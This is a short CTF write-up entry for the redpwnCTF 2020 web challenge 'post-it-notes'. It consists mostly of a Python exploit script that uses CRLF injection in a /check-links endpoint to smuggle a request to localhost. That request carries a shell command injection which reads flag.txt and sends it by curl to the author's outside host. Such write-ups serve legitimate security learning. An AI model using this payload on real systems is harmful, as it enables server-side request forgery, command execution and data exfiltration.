CTFtime.org

post-it-notes

by JustinOng / CTF.SG

Rating: 2.0

CRLF Injection in the `/check-links` endpoint

```
import requests
from urllib.parse import urljoin, quote_plus

HOST = "http://2020.redpwnc.tf:31957/"

link = "http://127.0.0.1\r\n\r\nGET /api/v1/notes/?title=" + quote_plus("'; curl http://justins.in/`cat flag.txt` #") + " HTTP/1.1\r\n\r\n:50596"

r = requests.post(urljoin(HOST, "/check-links"), data={
"links": link
})
```

Original writeup (https://blog.justins.in/redpwnctf-2020#web-post-it-notes).

Comments